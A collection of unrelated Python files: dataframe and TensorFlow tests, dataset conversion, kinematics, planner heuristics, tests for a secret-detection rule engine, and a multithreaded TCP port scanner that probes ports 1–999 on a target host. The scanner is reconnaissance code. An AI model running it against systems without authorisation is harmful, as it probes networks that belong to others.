    pd.testing.assert_index_equal(df2.chunks[0].index_value.to_pandas(), pd.RangeIndex(2))
    pd.testing.assert_series_equal(df2.chunks[0].dtypes, r.dtypes)
    assert df2.chunks[1].shape == (2, 3)
    pd.testing.assert_index_equal(df2.chunks[1].index_value.to_pandas(), pd.RangeIndex(2, 4))
    pd.testing.assert_series_equal(df2.chunks[1].dtypes, r.dtypes)
    df = md.DataFrame(data, chunk_size=1).reset_index(drop=True)
    r = data.reset_index(drop=True)
    assert df.shape == (4, 2)
    pd.testing.assert_series_equal(df.dtypes, r.dtypes)
    df2 = tile(df)
    assert len(df2.chunks) == 8
    for c in df2.chunks:
        assert c.shape == (1, 1)
        pd.testing.assert_index_equal(c.index_value.to_pandas(), pd.RangeIndex(c.index[0], c.index[0] + 1))
        pd.testing.assert_series_equal(c.dtypes, r.dtypes[c.index[1]: c.index[1] + 1])
    # test Series
    series_data = pd.Series([1, 2, 3, 4], name='foo',
                            index=pd.Index(['a', 'b', 'c', 'd'], name='idx'))
    s = md.Series(series_data, chunk_size=2).reset_index()
    r = series_data.reset_index()
    assert s.shape == (4, 2)
    pd.testing.assert_series_equal(s.dtypes, r.dtypes)
    s2 = tile(s)
    assert len(s2.chunks) == 2
    assert s2.chunks[0].shape == (2, 2)
    pd.testing.assert_index_equal(s2.chunks[0].index_value.to_pandas(), pd.RangeIndex(2))
    assert s2.chunks[1].shape == (2, 2)
    pd.testing.assert_index_equal(s2.chunks[1].index_value.to_pandas(), pd.RangeIndex(2, 4))
    with pytest.raises(TypeError):
        md.Series(series_data, chunk_size=2).reset_index(inplace=True)
def test_head_tail_optimize():
    """Negative cases of the head/tail tiling optimization: each condition
    that disqualifies an iloc op from the specialized head/tail path."""
    raw = pd.DataFrame(np.random.rand(4, 3))
    df = md.DataFrame(raw, chunk_size=2)
    # no nan chunk shape
    assert HeadTailOptimizedOperandMixin._need_tile_head_tail(tile(df).head(2).op) is False
    df2 = tile(df[df[0] < 0.5])
    # chunk shape on axis 1 greater than 1
    assert HeadTailOptimizedOperandMixin._need_tile_head_tail(df2.head(2).op) is False
    df = md.DataFrame(raw, chunk_size=(2, 3))
    df2 = tile(df[df[0] < 0.5])
    # not slice
    assert HeadTailOptimizedOperandMixin._need_tile_head_tail(df2.iloc[2].op) is False
    # step not None
    assert HeadTailOptimizedOperandMixin._need_tile_head_tail(df2.iloc[:2:2].op) is False
    # not head or tail
    assert HeadTailOptimizedOperandMixin._need_tile_head_tail(df2.iloc[1:3].op) is False
    # slice 1 is not slice(None)
    assert HeadTailOptimizedOperandMixin._need_tile_head_tail(df2.iloc[:3, :2].op) is False
def test_reindex():
    """reindex argument validation: unknown keyword raises TypeError and a
    tensor fill_value raises ValueError."""
    raw = pd.DataFrame(np.random.rand(4, 3))
    df = md.DataFrame(raw, chunk_size=2)
    with pytest.raises(TypeError):
        df.reindex(unknown_arg=1)
    with pytest.raises(ValueError):
        df.reindex([1, 2], fill_value=mt.tensor([1, 2]))
|
import csv
from os import getcwd
import pandas as pd
# Dataset splits to convert and the traffic-light class labels
# (class id written to the listing is the position in this list).
sets = [('2007', 'train'), ('2007', 'val'), ('2007', 'test')]
classes = ["go", "stop", "warning"]
# NOTE(review): the original assigned wd = getcwd() and immediately
# overwrote it with this hard-coded path; the dead store was removed.
wd = '/home/coldrain/data/'
# One CSV with all bounding-box annotations for the JPEG images.
sim = pd.read_csv(wd + 'VOCdevkit/VOC2007/JPEGImages/annotation.csv')
def convert_annotation(year, image_id, list_file):
    """Append every bounding box annotated for ``image_id`` to ``list_file``.

    Each box is written as " x1,y1,x2,y2,class_id" on the current line.
    ``year`` is unused but kept for interface compatibility with the caller.
    Iterates the annotation columns directly instead of positional
    ``sim[col][i]`` lookups (range-len anti-pattern, and fragile if the
    CSV index is ever non-default).
    """
    for filename, label, x1, y1, x2, y2 in zip(
            sim['Filename'], sim['label'],
            sim['Upper_left_corner_x'], sim['Upper_left_corner_y'],
            sim['Lower_right_corner_x'], sim['Lower_right_corner_y']):
        # Annotation rows are matched to the image by file stem; an image
        # may have several boxes, so keep scanning after a match.
        if filename.split('.')[0] == image_id:
            cls_id = classes.index(label)
            box = (int(x1), int(y1), int(x2), int(y2))
            list_file.write(" " + ",".join(str(a) for a in box) + ',' + str(cls_id))
# Build one listing file per (year, split): each line holds the image path
# followed by all of its ground-truth boxes.
for year, image_set in sets:
    ids_path = wd + 'VOCdevkit/VOC%s/ImageSets/Main/%s.txt' % (year, image_set)
    # `with` guarantees the handles are closed even if conversion fails
    # (the original leaked the ImageSets handle entirely).
    with open(ids_path) as ids_file:
        image_ids = ids_file.read().strip().split()
    with open(wd + '%s_%s.txt' % (year, image_set), 'w') as list_file:
        for image_id in image_ids:
            list_file.write('%sVOCdevkit/VOC%s/JPEGImages/%s.jpg' % (wd, year, image_id))
            convert_annotation(year, image_id, list_file)
            list_file.write('\n')
|
def histogram(s):
    """Return a dict mapping each character of ``s`` to its occurrence count.

    The original used ``d.get(c, s.count(c))`` as the fallback, which
    re-scans the whole string for every distinct character (O(n^2)).
    Incrementing a running tally produces the identical result in one
    O(n) pass.
    """
    d = dict()
    for c in s:
        d[c] = d.get(c, 0) + 1
    return d
# Demo: print the character frequencies of a sample word.
h = histogram('brontosaurus')
print(h)
|
from functools import wraps
from statsmodels.tools.data import _is_using_pandas
from statsmodels.tsa.base import datetools
from statsmodels.tsa.tsatools import freq_to_period
def _get_pandas_wrapper(X, trim_head=None, trim_tail=None, names=None):
index = X.index
#TODO: allow use index labels
if trim_head is None and trim_tail is None:
index = index
elif trim_tail is None:
index = index[trim_head:]
elif trim_head is None:
index = index[:-trim_tail]
else:
index = index[trim_head:-trim_tail]
if hasattr(X, "columns"):
if names is None:
names = X.columns
return lambda x : X.__class__(x, index=index, columns=names)
else:
if names is None:
names = X.name
return lambda x : X.__class__(x, index=index, name=names)
def _maybe_get_pandas_wrapper(X, trim_head=None, trim_tail=None):
    """
    If using pandas returns a function to wrap the results, e.g., wrapper(X)
    trim is an integer for the symmetric truncation of the series in some
    filters.
    otherwise returns None
    """
    if not _is_using_pandas(X, None):
        return None
    return _get_pandas_wrapper(X, trim_head, trim_tail)
def _maybe_get_pandas_wrapper_freq(X, trim=None):
    """Like _maybe_get_pandas_wrapper, but also return the index's inferred
    frequency; for non-pandas input return an identity wrapper and None."""
    if not _is_using_pandas(X, None):
        return (lambda x: x), None
    wrapper = _get_pandas_wrapper(X, trim)
    return wrapper, X.index.inferred_freq
def pandas_wrapper(func, trim_head=None, trim_tail=None, names=None, *args,
                   **kwargs):
    """Wrap ``func`` so that pandas input yields pandas output.

    Non-pandas input is passed straight through; pandas input has its
    (optionally trimmed) index and labels re-applied to the result.
    """
    @wraps(func)
    def new_func(X, *fargs, **fkwargs):
        # quick pass-through for do nothing case
        if not _is_using_pandas(X, None):
            return func(X, *fargs, **fkwargs)
        rewrap = _get_pandas_wrapper(X, trim_head, trim_tail, names)
        return rewrap(func(X, *fargs, **fkwargs))
    return new_func
def pandas_wrapper_bunch(func, trim_head=None, trim_tail=None,
                         names=None, *args, **kwargs):
    """Wrap ``func`` so that pandas input yields pandas output.

    The original body was a byte-for-byte duplicate of ``pandas_wrapper``;
    delegate to it instead of maintaining two copies.
    """
    return pandas_wrapper(func, trim_head, trim_tail, names, *args, **kwargs)
def pandas_wrapper_predict(func, trim_head=None, trim_tail=None,
                           columns=None, *args, **kwargs):
    """Placeholder for a prediction-result wrapper; not yet implemented."""
    pass
def pandas_wrapper_freq(func, trim_head=None, trim_tail=None,
                        freq_kw='freq', columns=None, *args, **kwargs):
    """
    Return a new function that catches the incoming X, checks if it's pandas,
    calls the functions as is. Then wraps the results in the incoming index.
    Deals with frequencies. Expects that the function returns a tuple,
    a Bunch object, or a pandas-object.
    """
    @wraps(func)
    def new_func(X, *fargs, **fkwargs):
        # quick pass-through for do nothing case
        if not _is_using_pandas(X, None):
            return func(X, *fargs, **fkwargs)
        rewrap = _get_pandas_wrapper(X, trim_head, trim_tail, columns)
        # convert the index's inferred frequency to a period and pass it on
        fkwargs[freq_kw] = freq_to_period(X.index.inferred_freq)
        return rewrap(func(X, *fargs, **fkwargs))
    return new_func
def dummy_func(X):
    """Identity helper for wrapper tests: return the input unchanged."""
    return X
def dummy_func_array(X):
    """Strip the pandas wrapper: return the underlying ndarray."""
    values = X.values
    return values
def dummy_func_pandas_columns(X):
    """Return the raw ndarray of a pandas object (columns-preserving test)."""
    values = X.values
    return values
def dummy_func_pandas_series(X):
    """Select column 'A' from a DataFrame (series-returning test helper)."""
    column_a = X['A']
    return column_a
import pandas as pd
import numpy as np
def test_pandas_freq_decorator():
    """pandas_wrapper: ndarray input passes straight through, pandas input
    is re-wrapped with the original columns, and ``names`` relabels them.
    NOTE(review): uses the deprecated ``pd.util.testing`` namespace —
    consider ``pd.testing`` for pandas >= 1.0."""
    X = pd.util.testing.makeDataFrame()
    # in X, get a function back that returns an X with the same columns
    func = pandas_wrapper(dummy_func)
    np.testing.assert_equal(func(X.values), X)
    func = pandas_wrapper(dummy_func_array)
    pd.util.testing.assert_frame_equal(func(X), X)
    expected = X.rename(columns=dict(zip('ABCD', 'EFGH')))
    func = pandas_wrapper(dummy_func_array, names=list('EFGH'))
    pd.util.testing.assert_frame_equal(func(X), expected)
|
class Solution:
    def XXX(self, str: str) -> int:
        """Parse a leading integer from a string (C-style atoi).

        Skips leading spaces, accepts one optional sign, consumes digits
        until the first non-digit, and clamps the result to the signed
        32-bit range.  (The parameter shadows the builtin ``str`` but is
        kept for interface compatibility.)
        """
        INT_MAX, INT_MIN = 2147483647, -2147483648
        digits = {c: i for i, c in enumerate('0123456789')}
        magnitude = 0
        sign = 1
        leading = True  # still inside the "spaces / one sign allowed" prefix
        for ch in str:
            if leading and ch == ' ':
                continue
            if leading and ch in '+-':
                sign = -1 if ch == '-' else 1
                leading = False
                continue
            if ch not in digits:
                # first non-digit terminates parsing (a second sign, a space
                # after digits, a letter, ...)
                break
            magnitude = magnitude * 10 + digits[ch]
            leading = False
        result = sign * magnitude
        # Clamp into the 32-bit signed range.
        if result > INT_MAX:
            result = INT_MAX
        elif result < INT_MIN:
            result = INT_MIN
        return result
# (extraction artifact: the following JavaScript scraper snippet was fused
# into this file during extraction and is not part of the Python solution)
# undefined
# for (i = 0; i < document.getElementsByTagName("code").length; i++) { console.log(document.getElementsByTagName("code")[i].innerText); }
|
import sys
import socket
import threading
# Shared scan state: ports found open, the socket used for probing, and a
# lock serializing worker-thread access to the shared socket and list.
opened_ports = []
socket_instance = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
mutex = threading.Lock()
def is_valid_ipv4_address(address):
    """Return True if ``address`` is a valid dotted-quad IPv4 address.

    Falls back to ``inet_aton`` on platforms without ``inet_pton``;
    since ``inet_aton`` also accepts short forms (e.g. "127.1"), an
    explicit three-dot check is applied on that path.
    """
    try:
        socket.inet_pton(socket.AF_INET, address)
        return True
    except AttributeError:
        # inet_pton is unavailable on this platform
        try:
            socket.inet_aton(address)
        except socket.error:
            return False
        return address.count('.') == 3
    except socket.error:
        return False
def check_port(target, port):
    """Probe one TCP port on ``target``; record it in ``opened_ports`` if open.

    A socket object can only be connected once, so each probe creates its
    own socket — the original reused the single module-level socket, which
    stops working after the first successful connection.  The lock now only
    guards the shared list, so probes actually run concurrently.
    """
    probe = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    probe.settimeout(2)
    try:
        if probe.connect_ex((target, port)) == 0:
            with mutex:
                opened_ports.append(port)
    finally:
        probe.close()
def main():
    """Resolve the target, scan ports 1-999 concurrently, print open ports."""
    target = ''  # provide a domain or an ipv4 address
    if not is_valid_ipv4_address(target):
        try:
            target = socket.gethostbyname(target)
        except socket.error as err:
            print("socket creation failed with error %s" % (err))
            sys.exit()
    # Apply the timeout regardless of how the target was given (the
    # original only set it on the hostname path).
    socket_instance.settimeout(2)
    threads = []
    for port in range(1, 1000):
        try:
            worker = threading.Thread(target=check_port, args=(target, port))
            worker.start()
            threads.append(worker)
        except RuntimeError:
            print("Error: unable to start thread")
    # Wait for every probe to finish; the original printed the list while
    # worker threads were still appending to it.
    for worker in threads:
        worker.join()
    print(opened_ports)
    socket_instance.close()
# Run the scan only when executed as a script.
if __name__ == '__main__':
    main()
|
from commands.command import Command
from fbchat import Message
from fbchat import Mention
class countdown(Command):
    """Chat command: toggles the countdown feature (YES/NO), reports its
    state with no arguments, or — when enabled — counts down from NUMBER
    by re-issuing "!countdown N-1" so the bot triggers itself."""

    def run(self):
        # Default the persisted toggle to enabled on first use.
        if 'countdown' not in self.database:
            self.database['countdown'] = "enabled"
        # Mention the caller by first name ("+ 1" covers the leading "@").
        mentions = [Mention(self.author_id, length=len(self.author.first_name) + 1)]
        if len(self.user_params) == 0:
            # No argument: just report the current state.
            response_text = "@" + self.author.first_name + " Countdown is currently " + self.database['countdown']
        elif self.user_params[0].lower() == "no":
            self.database['countdown'] = "disabled"
            response_text = "@" + self.author.first_name + " Countdown is now " + self.database['countdown']
        elif self.user_params[0].lower() == "yes":
            self.database['countdown'] = "enabled"
            response_text = "@" + self.author.first_name + " Countdown is now " + self.database['countdown']
        elif len(self.user_params) == 1 and self.database['countdown'] == "enabled":
            try:
                count = int(self.user_params[0])
                if count > 10:
                    response_text = "I'm too lazy to do that..."
                elif count <= 0:
                    response_text = "Lets do it again!"
                else:
                    # Re-issuing the command makes the bot count itself down.
                    response_text = "!countdown " + str(count - 1)
                    mentions = None
            except ValueError:
                # Non-numeric, non-YES/NO argument.
                response_text = "You think you're soooo clever? Not anymore " + self.author.first_name + ", because I now have error catching!"
                mentions = None
        else:
            # Numeric argument while the feature is disabled.
            response_text = "Sorry, !countdown is currently disabled. Please type !countdown YES and try again."
            mentions = None
        self.client.send(
            Message(text=response_text, mentions=mentions),
            thread_id=self.thread_id,
            thread_type=self.thread_type
        )

    def define_documentation(self):
        """Describe the command for the bot's help listing."""
        self.documentation = {
            "parameters": "NUMBER / YES / NO",
            "function": "Counts down recursively from NUMBER or enables/disables the countdown."
        }
|
import tensorflow as tf
from absl.testing import parameterized
from model.architectures.losses import Momentum_Neighbors_NT_X, Momentum_NT_X, get_neighbors_mask_temporal, \
get_neighbors_dt_label_multiclass
class LossTest(parameterized.TestCase, tf.test.TestCase):
    """Tests for the neighborhood-contrastive losses and neighbor-mask
    builders in model.architectures.losses."""

    @parameterized.named_parameters(("base",))
    def test_NCL_loss(self, ):
        """With orthogonal samples, both the plain momentum NT-Xent loss and
        the neighbor variant must reach 0 and agree with each other."""
        samples = tf.eye(100)  # all samples are orthogonal one another
        neigh_queue = tf.random.uniform((500, 2), 0, 1000.0)
        queue = tf.concat([samples, tf.zeros((400, 100))], axis=0)
        outputs_regular_CL = Momentum_NT_X([samples, queue], 0.05)
        outputs_CL_as_NCL = Momentum_Neighbors_NT_X([samples, queue], neigh_queue, 0.05, 1.0,
                                                    get_neighbors_mask_temporal)
        loss_CL = outputs_regular_CL[0]
        loss_CL_as_NCL = outputs_CL_as_NCL[0]
        self.assertAlmostEqual(loss_CL.numpy(), 0.0)
        self.assertAlmostEqual(loss_CL_as_NCL.numpy(), 0.0)
        self.assertEqual(loss_CL_as_NCL.numpy(), loss_CL.numpy())

    @parameterized.named_parameters(('base', tf.stack([tf.range(100) + 1, -tf.range(100) - 1], axis=1),
                                     tf.stack([-tf.range(400) - 1, tf.range(400) + 1], axis=1), 0))
    def test_n_w(self, samples, queue, threshold):
        """Temporal neighbor mask: each sample is its own (only) neighbor in
        a disjoint queue, and appears exactly twice in a duplicated queue."""
        neigh_mat_diag = get_neighbors_mask_temporal(samples, tf.concat([samples, queue], axis=0), threshold)
        neigh_mat_double = get_neighbors_mask_temporal(samples, tf.concat([samples, samples], axis=0), threshold)
        self.assertAllEqual(neigh_mat_diag[:100, :100], tf.eye(100))
        self.assertAllEqual(tf.reduce_sum(neigh_mat_double, axis=1), 2 * tf.ones((100,)))

    @parameterized.named_parameters(
        ('base', tf.random.uniform((100, 1), 1, 1000.0), - tf.random.uniform((400, 1), 1, 1000.0)))
    def test_n_Y(self, samples, queue):
        """Multiclass label neighbor mask: same invariants as the temporal
        mask — identity block against a disjoint queue, row sum 2 when the
        queue duplicates the samples."""
        neigh_mat_diag = get_neighbors_dt_label_multiclass(samples, tf.concat([samples, queue], axis=0))
        neigh_mat_double = get_neighbors_dt_label_multiclass(samples, tf.concat([samples, samples], axis=0))
        self.assertAllEqual(neigh_mat_diag[:100, :100], tf.eye(100))
        self.assertAllEqual(tf.reduce_sum(neigh_mat_double, axis=1), 2 * tf.ones((100,)))
# Run the TF test suite when executed as a script.
if __name__ == '__main__':
    tf.test.main()
|
## @package SimpleKL Provides some simple kinematic functions
import numpy as np
from Module import *
## Rotation matrix around x axis
# @param row Roll angle in radians
# @return Numpy matrix object of rotation matrix
def rotx(row):
    c, s = np.cos(row), np.sin(row)
    return np.matrix([[1, 0, 0],
                      [0, c, -s],
                      [0, s, c]])
## Rotation matrix around y axis
# @param pitch Pitch angle in radians
# @return Numpy matrix object of rotation matrix
def roty(pitch):
    c, s = np.cos(pitch), np.sin(pitch)
    return np.matrix([[c, 0, s],
                      [0, 1, 0],
                      [-s, 0, c]])
## Rotation matrix around z axis
# @param yaw Yaw angle in radians
# @return Numpy matrix object of rotation matrix
def rotz(yaw):
    c, s = np.cos(yaw), np.sin(yaw)
    return np.matrix([[c, -s, 0],
                      [s, c, 0],
                      [0, 0, 1]])
## Checks whether two faces are close enough to connect
# @param pos1 Face norm vector of the first face
# @param pos2 Face norm vector of the second face
# @return True if the face distance is within [0.098, 0.102], else False
def CloseEnough(pos1, pos2):
    delta = np.matrix([[pos1[0] - pos2[0]],
                       [pos1[1] - pos2[1]],
                       [pos1[2] - pos2[2]]])
    # Nominal face spacing is 0.1; allow +/- 0.002 tolerance.
    return bool(0.098 <= np.linalg.norm(delta) <= 0.102)
## Helper: pick the face of a module whose world-frame normal aligns with
## the reference direction between the two modules.
# @param module Module object (uses .rotation_matrix)
# @param joint List of joint angles; joint[3] pivots the back face
# @param reference_vec Unit 3x1 np.matrix from module1 to module2
# @param sign +1 when alignment means dot >= threshold, -1 for dot <= -threshold
# @return Face node index (0=front, 1=left, 2=right, 3=back) or 4 if none
def _facing_node(module, joint, reference_vec, sign):
    threshold = 0.98
    # Face normals in the module frame; order matters — the original code
    # checked left, right, back, front in sequence with later matches
    # overwriting earlier ones, which is preserved here.
    faces = [
        (1, np.matrix([[1], [0], [0]])),                    # left
        (2, np.matrix([[-1], [0], [0]])),                   # right
        (3, rotx(joint[3]) * np.matrix([[0], [1], [0]])),   # back (pivots with joint 3)
        (0, np.matrix([[0], [-1], [0]])),                   # front
    ]
    node = 4
    for index, face_vec in faces:
        world_vec = module.rotation_matrix * face_vec
        alignment = np.dot(reference_vec.transpose().tolist()[0],
                           world_vec.transpose().tolist()[0])
        if sign * alignment >= threshold:
            node = index
    return node


## Giving position of two modules to check which faces can be connected
# @param module1 The first module (uses .Position and .rotation_matrix)
# @param joint1 List of joint angles of module 1
# @param module2 The second module
# @param joint2 List of joint angles of module 2
# @return (node1, node2) face-index pair when connectable; otherwise False
def Connectable(module1, joint1, module2, joint2):
    # Unit vector pointing from module2 toward module1.
    referenceVec = np.matrix([[module1.Position[0] - module2.Position[0]],
                              [module1.Position[1] - module2.Position[1]],
                              [module1.Position[2] - module2.Position[2]]])
    referenceVec = referenceVec / np.linalg.norm(referenceVec)
    # The two halves of the original were copy-pasted duplicates differing
    # only in the comparison sign; the shared helper removes the duplication.
    connect1 = _facing_node(module1, joint1, referenceVec, -1)
    connect2 = _facing_node(module2, joint2, referenceVec, 1)
    if connect1 != 4 and connect2 != 4:
        return (connect1, connect2)
    return False
from pathlib import Path
from re import compile
import pytest
from tests.unit.conftest import FIXTURE_PATH, does_not_raise, rule_path
from whispers.plugins import Yml
from whispers.rules import WhisperRules
from whispers.utils import load_yaml_from_file
@pytest.mark.parametrize(
    ("rulefile", "expectation"),
    [
        ("empty.yml", does_not_raise()),
        ("valid.yml", does_not_raise()),
        ("multiple.yml", does_not_raise()),
        ("invalid_severity.yml", pytest.raises(ValueError)),
    ],
)
def test_load_rules(rulefile, expectation):
    """load_rules replaces the rule set with the file's rules; an invalid
    severity raises ValueError."""
    rules = WhisperRules(rulespath=rule_path("empty.yml"))
    rulefile = rule_path(rulefile)
    ruleyaml = load_yaml_from_file(Path(rulefile))
    with expectation:
        rules.load_rules(rulefile)
        assert len(rules.rules) == len(ruleyaml)
        for rule_id in ruleyaml.keys():
            assert rule_id in rules.rules
@pytest.mark.parametrize(
    ("rulefile", "expectation"),
    [("valid.yml", does_not_raise()), ("doesnotexist.yml", pytest.raises(FileNotFoundError))],
)
def test_load_rules_from_file(rulefile, expectation):
    """Loading a single-rule file adds exactly one rule; a missing file
    raises FileNotFoundError."""
    rules = WhisperRules()
    rules_len = len(rules.rules)
    with expectation:
        rules.load_rules_from_file(Path(rule_path(rulefile)))
        assert len(rules.rules) == rules_len + 1
@pytest.mark.parametrize(
    ("rulefile", "rules_added"),
    [("empty.yml", 0), ("valid.yml", 1), ("multiple.yml", 4)],
)
def test_load_rules_from_dict(rulefile, rules_added):
    """load_rules_from_dict adds one rule per dict entry on top of the
    defaults."""
    rules = WhisperRules()
    rules_len = len(rules.rules)
    custom_rules = load_yaml_from_file(Path(rule_path(rulefile)))
    rules.load_rules_from_dict(custom_rules)
    assert len(rules.rules) == rules_len + rules_added
@pytest.mark.parametrize(("dups", "expectation"), [(1, does_not_raise()), (2, pytest.raises(IndexError))])
def test_load_rule(dups, expectation):
    """Loading the same rule id twice raises IndexError; a single load
    stores the rule verbatim."""
    rules = WhisperRules()
    rulefile = Path(rule_path("valid.yml"))
    rule_id, rule = load_yaml_from_file(rulefile).popitem()
    with expectation:
        for _ in range(dups):
            rules.load_rule(rule_id, rule)
        assert rule_id in rules.rules
        assert rules.rules[rule_id] == rule
@pytest.mark.parametrize(
    ("rulefile", "expectation"),
    [("invalid_severity.yml", pytest.raises(ValueError)), ("multiple.yml", does_not_raise())],
)
def test_parse_rule(rulefile, expectation):
    """parse_rule preserves all rule keys; an invalid severity raises."""
    rules = WhisperRules()
    rulefile = Path(rule_path(rulefile))
    rule_id, rule = load_yaml_from_file(rulefile).popitem()
    with expectation:
        parsed_rule = rules.parse_rule(rule_id, rule)
        for key in parsed_rule:
            assert parsed_rule[key] == rule[key]
@pytest.mark.parametrize(("value", "expectation"), [("test", True), ("Test", False), ("1test", False)])
def test_match(value, expectation):
    """match applies the named rule's regex to the value (case-sensitive,
    anchored per the fixture rule)."""
    rules = WhisperRules(rulespath=rule_path("valid.yml"))
    assert rules.match("valid", value) == expectation
@pytest.mark.parametrize(
    ("ruleslist", "expectation"),
    [
        ("inexistent-rule-id", 0),
        ("apikey", 2),
        ("password", 3),
        ("apikey,password", 5),
    ],
)
def test_check(ruleslist, expectation):
    """End-to-end check over a fixture file: only rules named in
    ``ruleslist`` contribute findings, and counts are additive."""
    filepath = FIXTURE_PATH.joinpath("ruleslist.yml")
    rules = WhisperRules(ruleslist=ruleslist)
    result = 0
    for key, value, _ in Yml(rules).pairs(filepath):
        result += len(list(rules.check(key, value, filepath, [])))
    assert result == expectation
@pytest.mark.parametrize(
    ("rule", "value", "expectation"),
    [
        ({"value": {"minlen": 1}}, "", False),
        ({"value": {"minlen": 1}}, "1", True),
        ({"key": {"minlen": 100}}, "whispers", True),
        ({"value": {"minlen": 4}}, "whispers", True),
        ({"value": {}}, "whispers", True),
        ({"value": {}}, b"binary", True),
        ({"value": {"minlen": -11}}, "", False),
        ({"value": {"minlen": None}}, "", False),
    ],
)
def test_check_minlen(rule, value, expectation):
    """check_minlen enforces a minimum length on the targeted field only,
    treating a missing/None/absurd minlen per the fixtures above."""
    rules = WhisperRules()
    result = rules.check_minlen(rule, "value", value)
    assert result == expectation
@pytest.mark.parametrize(
    ("rule", "value", "expectation"),
    [
        ({"value": {"regex": compile(r"[a-z]+")}}, "whispers", True),
        ({"value": {"regex": compile(r"[A-Z]+")}}, "whispers", False),
        ({"key": {"regex": compile(r"[a-z]+")}}, "whispers", True),
        ({"value": {"regex": compile(r"[a-z]+")}}, b"binary", False),
        ({"value": {"regex": compile(r"[a-z]+")}}, 1, False),
        ({"value": {"regex": compile(r"[a-z]+")}}, None, False),
    ],
)
def test_check_regex(rule, value, expectation):
    """check_regex matches only str values against the rule's compiled
    pattern; bytes, ints and None never match."""
    rules = WhisperRules()
    result = rules.check_regex(rule, "value", value)
    assert result == expectation
@pytest.mark.parametrize(
    ("rule", "key", "value", "expectation"),
    [
        ({"similar": 0.3}, "A", "a", True),
        ({"similar": 0.3}, "B", "a", False),
        ({"similar": 0.3}, "a", "a" * 5, True),
        ({"similar": 0.3}, "a", "a" * 6, False),
        ({"similar": 0.3}, "API_TOKEN", "${API_TOKEN}", True),
        ({"similar": 0.3}, "API_TOKEN", "API_TOKEN_PLACEHOLDER", True),
    ],
)
def test_check_similar(rule, key, value, expectation):
    """check_similar flags key/value pairs whose similarity exceeds the
    rule's threshold (placeholder-style values count as similar)."""
    rules = WhisperRules()
    result = rules.check_similar(rule, key, value)
    assert result == expectation
@pytest.mark.parametrize(
    ("encoded", "value", "expectation"),
    [
        (True, "d2hpc3BlcnM=", "whispers"),
        (False, "d2hpc3BlcnM=", "d2hpc3BlcnM="),
        (False, "whisper$", "whisper$"),
        (False, None, None),
        (False, 1, 1),
    ],
)
def test_decode_if_base64(encoded, value, expectation):
    """decode_if_base64 decodes only when the rule sets isBase64; all other
    values pass through unchanged."""
    rules = WhisperRules()
    rule = {"value": {"isBase64": encoded}}
    result = rules.decode_if_base64(rule, "value", value)
    assert result == expectation
@pytest.mark.parametrize(
    ("value", "expectation"),
    [("whispers", True), (123, False), (b"binary", True), (b"\xca\xfe", False), (None, False), ("шёпот", False)],
)
def test_is_ascii(value, expectation):
    """is_ascii accepts ASCII-only str/bytes; non-ASCII and non-text are rejected."""
    assert WhisperRules().is_ascii(value) == expectation
|
from set_additive import *
from ff import *
from set_additive import applicable as sa_applicable, first_goals as sa_first_goals, \
first_operators as sa_first_operators, first_combine as sa_first_combine
from planner.main import default_plan, simple_debug
from planner.progression import *
def h_0(state, goal, operators):
    """Null heuristic: estimates zero remaining cost from any state."""
    return 0
def h_naive(state, goal, operators):
    """Count how many goal conditions are not yet satisfied in state."""
    unsatisfied = 0
    for var, value in goal.cond():
        if state[var] != value:
            unsatisfied += 1
    return unsatisfied
def h_blind(state, goal, operators):
    """Cheapest applicable action's cost (raises ValueError if none apply)."""
    return min(op.cost for op in ha_applicable(state, goal, operators))
###########################################################################

def ha_all(state, goal, operators):
    """All non-axiom operators, regardless of applicability."""
    return filter_axioms(operators)

def ha_applicable(state, goal, operators):
    """Non-axiom operators whose preconditions hold in state."""
    applicable = [op for op in operators if op(state) is not None]
    return filter_axioms(applicable)

def ha_all_random(state, goal, operators):
    """ha_all in randomized order."""
    return randomize(ha_all(state, goal, operators))

def ha_applicable_random(state, goal, operators):
    """ha_applicable in randomized order."""
    return randomize(ha_applicable(state, goal, operators))

def ha_sorted(state, goal, operators):
    """ha_applicable ordered by increasing operator cost."""
    return sorted(ha_applicable(state, goal, operators), key=lambda op: op.cost)
def ha_combine(state, goal, operators, *helpful_actions):
    """Yield one operator list per helpful-action source, deduplicated across sources.

    Each helpful_actions entry is a function (state, goal, operators) -> operators.
    """
    seen_operators = set()
    for ha in helpful_actions:
        ha_operators = []
        for operator in ha(state, goal, operators):
            # NOTE(review): seen_operators is never updated explicitly here, so
            # this assumes in_add() both tests membership AND inserts — confirm.
            if not in_add(seen_operators, operator):
                ha_operators.append(operator)
        yield ha_operators
###########################################################################
def combine(heuristic, helpful_actions):
    """Fuse a heuristic and a helpful-action function into one successor function."""
    def successors(state, goal, operators):
        h = heuristic(state, goal, operators)
        ha = helpful_actions(state, goal, operators)
        return h, ha
    return successors
def single_complete_ff(ff):
    """Wrap ff so its helpful actions are padded with all other applicable operators."""
    def fn(state, goal, operators):
        h, helpful = ff(state, goal, operators)
        remainder = set(ha_applicable(state, goal, operators)) - set(helpful)
        return h, helpful + list(remainder)
    return fn
def multi_complete_ff(ff):
    """Wrap ff to yield its own helpful actions first, then the remaining applicable ops."""
    def fn(state, goal, operators):
        h, helpful = ff(state, goal, operators)
        yield h, helpful
        yield h, set(ha_applicable(state, goal, operators)) - set(helpful)
    return fn
# TODO - the original operator order is affecting things a lot
# NOTE - expensive to do sa for many successors (the union operation)
#default_successors = combine(h_0, ha_applicable_random)
#default_successors = combine(h_level, ha_applicable_random)
#default_successors = combine(h_sa, ha_applicable_random)
# Active choice: FF heuristic on summed plan cost with combined helpful actions.
default_successors = ff_fn(plan_cost, first_combine, op=sum)
#default_successors = sa_fn(sa_first_operators) # sa_first_goals | sa_first_operators | sa_first_combine
###########################################################################
def single_generator(initial, goal, operators, successors):
    """Build a vertex expander yielding exactly one successors() evaluation."""
    #return lambda v: (yield successors(v.state, goal, operators))
    def expand(v):
        # Evaluate eagerly, then hand back a one-item iterator.
        return iter([successors(v.state, goal, operators)])
    return expand
def multi_generator(initial, goal, operators, successors):
    """Build a vertex expander iterating over everything successors() yields."""
    def expand(v):
        return iter(successors(v.state, goal, operators))
    return expand
# Default vertex expander: one default_successors evaluation per vertex.
default_generator = lambda i, g, o: single_generator(i, g, o, default_successors)
###########################################################################
from downward2 import write_sas, solve_sas
from collections import OrderedDict
class Problem(object):
    """Indexed encoding of a planning problem, fed to solve_sas/write_sas.

    Assigns a dense integer index to every state variable and to every value
    each variable can take, collected from the initial state, the goal, and
    all action conditions and effects.  (Python 2 code: iteritems/print.)
    """

    # Implicit first value registered for every variable (index 0).
    default_val = False

    def __init__(self, initial, goal, actions, axioms):
